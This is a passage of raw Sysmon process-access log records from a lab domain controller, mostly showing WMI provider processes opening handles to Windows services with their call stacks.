44c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-83AA-00000000AD01}14172C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-83AA-00000000AD01}14172C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D64-603E-83AA-00000000AD01}141728496C:\Windows\system32\conhost.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\